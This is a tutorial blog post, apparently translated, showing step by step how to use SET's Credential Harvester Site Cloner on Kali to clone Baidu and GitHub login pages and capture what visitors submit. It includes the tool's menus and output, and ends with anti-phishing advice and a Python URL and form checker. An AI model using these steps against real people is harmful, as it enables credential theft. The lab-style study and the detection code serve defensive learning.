A Simple Social-Engineering Attack with setoolkit

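The tool ships with Kali. Type setoolkit in a terminal and press Enter. On first launch it shows a prompt; enter y and press Enter to agree to use it.
1. setoolkit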


2. This brings up the tool's interface. I won't screenshot the logo at the top; go straight to the menu at the bottom, where we choose the first entry, Social-Engineering Attacks.

3. Pressing Enter brings up the next screen, a long block of English text. Choose the second entry here, Website Attack Vectors.

4. Press Enter and read more English text. We choose the third entry, Credential Harvester Attack Method.

5. Press Enter again and read more English text. This is the last menu; choose the second entry, Site Cloner.

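6. After pressing Enter you are asked for the IP address to listen on. The goal of this attack is to produce a copy of the original site's page and have the user visit it and log in; once they enter a password and submit, data that should have stayed hidden is submitted to the IP address we enter here. I entered the Kali machine's address.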

7. You are asked for the URL of the site to clone. I used Baidu's URL directly for the test.

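8. After a short wait the following screen appears. We are meant to capture a username and password, but Baidu's home page has no input form that submits via POST, so the tool pauses partway to ask whether to continue. Just press Enter here, which confirms that the clone is complete. Then we visit the site locally: the cloned site is placed in Kali's /var/www/html directory by default and can be reached by IP. The screenshot shows the result after I had already visited it once locally, and the visiting IP is 127.0.0.1.

9. Then we open this fake site in a local browser.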

Of course, with the address bar hidden it would look very convincing. Try typing something into the search box and pressing Enter.

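You will quickly see the browser redirect.

The backend has also captured the IP that visited the site.

The browser redirects normally because this is roughly how a phishing site works: it first presents a high-fidelity imitation page for you to enter a username and password, and when you finish and click submit, the page sends you straight to the legitimate site. The cloned site is only a decoy; once the decoy has done its work it sends you back to the real site. This makes people think the browser simply lagged and the login did not go through, but in fact the decoy has already recorded the password that was just entered.

But this result is not very visible: the tool only captured an IP and did not extract any content for me, so I started a DVWA target machine and repeated the steps above.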


           ,..-,
         ,;;f^^"""-._
        ;;'          `-.
       ;/               `.
       ||  _______________\_______________________
       ||  |HHHHHHHHHHPo"~~\"o?HHHHHHHHHHHHHHHHHHH|
       ||  |HHHHHHHHHP-._   \,'?HHHHHHHHHHHHHHHHHH|
        |  |HP;""?HH|    """ |_.|HHP^^HHHHHHHHHHHH|
        |  |HHHb. ?H|___..--"|  |HP ,dHHHPo'|HHHHH|
        `| |HHHHHb.?Hb    .--J-dHP,dHHPo'_.rdHHHHH|
         \ |HHHi.`;;.H`-./__/-'H_,--'/;rdHHHHHHHHH|
           |HHHboo.\ `|"\"/"\" '/\ .'dHHHHHHHHHHHH|
           |HHHHHHb`-|.  \|  \ / \/ dHHHHHHHHHHHHH|
           |HHHHHHHHb| \ |\   |\ |`|HHHHHHHHHHHHHH|
           |HHHHHHHHHb  \| \  | \| |HHHHHHHHHHHHHH|
           |HHHHHHHHHHb |\  \|  |\|HHHHHHHHHHHHHHH|
           |HHHHHHHHHHHb| \  |  / dHHHHHHHHHHHHHHH|
           |HHHHHHHHHHHHb  \/ \/ .fHHHHHHHHHHHHHHH|
           |HHHHHHHHHHHHH| /\ /\ |HHHHHHHHHHHHHHHH|
           |""""""""""""""""""""""""""""""""""""""|
           |,;=====.     ,-.  =.       ,=,,=====. |
           |||     '    //"\\   \\   //  ||     ' |
           |||         ,/' `\.  `\. ,/'  ``=====. |
           |||     .   //"""\\   \\_//    .     |||
           |`;=====' =''     ``=  `-'     `=====''|
           |______________________________________|
	

[---]        The Social-Engineer Toolkit (SET)         [---]
[---]        Created by: David Kennedy (ReL1K)         [---]
                      Version: 7.7.9
                   Codename: 'Blackout'
[---]        Follow us on Twitter: @TrustedSec         [---]
[---]        Follow me on Twitter: @HackingDave        [---]
[---]       Homepage: https://www.trustedsec.com       [---]
        Welcome to the Social-Engineer Toolkit (SET).
         The one stop shop for all of your SE needs.

     Join us on irc.freenode.net in channel #setoolkit

   The Social-Engineer Toolkit is a product of TrustedSec.

           Visit: https://www.trustedsec.com

   It's easy to update using the PenTesters Framework! (PTF)
Visit https://github.com/trustedsec/ptf to update all your tools!


          There is a new version of SET available.
                     Your version: 7.7.9
                  Current version: 8.0.1

Please update SET to the latest before submitting any git issues.


 Select from the menu:

   1) Spear-Phishing Attack Vectors
   2) Website Attack Vectors
   3) Infectious Media Generator
   4) Create a Payload and Listener
   5) Mass Mailer Attack
   6) Arduino-Based Attack Vector
   7) Wireless Access Point Attack Vector
   8) QRCode Generator Attack Vector
   9) Powershell Attack Vectors
  10) SMS Spoofing Attack Vector
  11) Third Party Modules

  99) Return back to the main menu.

set> 2

The Web Attack module is a unique way of utilizing multiple web-based attacks in order to compromise the intended victim.

The Java Applet Attack method will spoof a Java Certificate and deliver a metasploit based payload. Uses a customized java applet created by Thomas Werth to deliver the payload.

The Metasploit Browser Exploit method will utilize select Metasploit browser exploits through an iframe and deliver a Metasploit payload.

The Credential Harvester method will utilize web cloning of a web- site that has a username and password field and harvest all the information posted to the website.

The TabNabbing method will wait for a user to move to a different tab, then refresh the page to something different.

The Web-Jacking Attack method was introduced by white_sheep, emgent. This method utilizes iframe replacements to make the highlighted URL link to appear legitimate however when clicked a window pops up then is replaced with the malicious link. You can edit the link replacement settings in the set_config if its too slow/fast.

The Multi-Attack method will add a combination of attacks through the web attack menu. For example you can utilize the Java Applet, Metasploit Browser, Credential Harvester/Tabnabbing all at once to see which is successful.

The HTA Attack method will allow you to clone a site and perform powershell injection through HTA files which can be used for Windows-based powershell exploitation through the browser.

   1) Java Applet Attack Method
   2) Metasploit Browser Exploit Method
   3) Credential Harvester Attack Method
   4) Tabnabbing Attack Method
   5) Web Jacking Attack Method
   6) Multi-Attack Web Method
   7) Full Screen Attack Method
   8) HTA Attack Method

  99) Return to Main Menu

set:webattack>3

 The first method will allow SET to import a list of pre-defined web
 applications that it can utilize within the attack.

 The second method will completely clone a website of your choosing
 and allow you to utilize the attack vectors within the completely
 same web application you were attempting to clone.

 The third method allows you to import your own website, note that you
 should only have an index.html when using the import website
 functionality.
   
   1) Web Templates
   2) Site Cloner
   3) Custom Import

  99) Return to Webattack Menu

set:webattack>2
[-] Credential harvester will allow you to utilize the clone capabilities within SET
[-] to harvest credentials or parameters from a website as well as place them into a report

-------------------------------------------------------------------------------
--- * IMPORTANT * READ THIS BEFORE ENTERING IN THE IP ADDRESS * IMPORTANT * ---

The way that this works is by cloning a site and looking for form fields to
rewrite. If the POST fields are not usual methods for posting forms this 
could fail. If it does, you can always save the HTML, rewrite the forms to
be standard forms and use the "IMPORT" feature. Additionally, really 
important:

If you are using an EXTERNAL IP ADDRESS, you need to place the EXTERNAL
IP address below, not your NAT address. Additionally, if you don't know
basic networking concepts, and you have a private IP address, you will
need to do port forwarding to your NAT IP address from your external IP
address. A browser doesns't know how to communicate with a private IP
address, so if you don't specify an external IP address if you are using
this from an external perpective, it will not work. This isn't a SET issue
this is how networking works.

set:webattack> IP address for the POST back in Harvester/Tabnabbing [kali ip]:kali ip
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone:https://github.com 

[*] Cloning the website: https://github.com
[*] This could take a little bit...

The best way to use this attack is if username and password form
fields are available. Regardless, this captures all POSTs on a website.
[*] You may need to copy /var/www/* into /var/www/html depending on where your directory structure is.
Press {return} if you understand what we're saying here.
[*] The Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:


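Here you can see that I chose the GitHub site. The cloned copy is as shown in the screenshot, and the browser has already given me a risk warning.

Then we try entering some content and submitting it.

After submitting, we are redirected to the real GitHub site.

Switching back to Kali at this point, we can see that all the information the user entered has been captured.
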
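This completes a simple phishing site. In real use such a decoy page is hosted on the public internet, but however the site is forged, its URL can never be identical to the original's. Distinguish it by the detailed differences in its URL, and also pay attention to the browser's own built-in security warnings.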
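
The URL check described above can be automated on the defender's side. The following is an added example, not part of the original post or of SET: it flags a page whose hostname is not the expected domain, and any form with a password field whose POST target is not that domain either. The function names, finding labels and sample HTML are constructed for illustration.

```python
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

class FormCollector(HTMLParser):
    """Collect each form's action and whether it holds a password input."""
    def __init__(self):
        super().__init__()
        self.forms = []  # [action, has_password] per <form>

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.forms.append([a.get("action") or "", False])
        elif tag == "input" and self.forms and (a.get("type") or "").lower() == "password":
            self.forms[-1][1] = True

def host_is_trusted(host, expected):
    """True only for the expected domain or a genuine subdomain of it."""
    host = (host or "").lower().rstrip(".")
    return host == expected or host.endswith("." + expected)

def is_ip(host):
    try:
        ipaddress.ip_address(host or "")
        return True
    except ValueError:
        return False

def check_login_page(page_url, html, expected):
    """Return findings for a page that claims to be the site `expected`."""
    page = urlsplit(page_url)
    findings = []
    if not host_is_trusted(page.hostname, expected):
        findings.append("page-host-mismatch")
    if is_ip(page.hostname):
        findings.append("page-served-from-ip")
    parser = FormCollector()
    parser.feed(html)
    for action, has_password in parser.forms:
        target = urlsplit(urljoin(page_url, action)).hostname
        if has_password and not host_is_trusted(target, expected):
            findings.append("password-form-posts-to:" + str(target))
    return findings

# Constructed sample: a cloned-looking login form posting to an RFC 5737 test address.
SAMPLE_HTML = ('<form method="post" action="http://192.0.2.10/">'
               '<input name="login"><input type="password" name="password"></form>')
```

The suffix match requires a leading dot, so a lookalike such as github.com.example.net is not treated as a subdomain of github.com.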
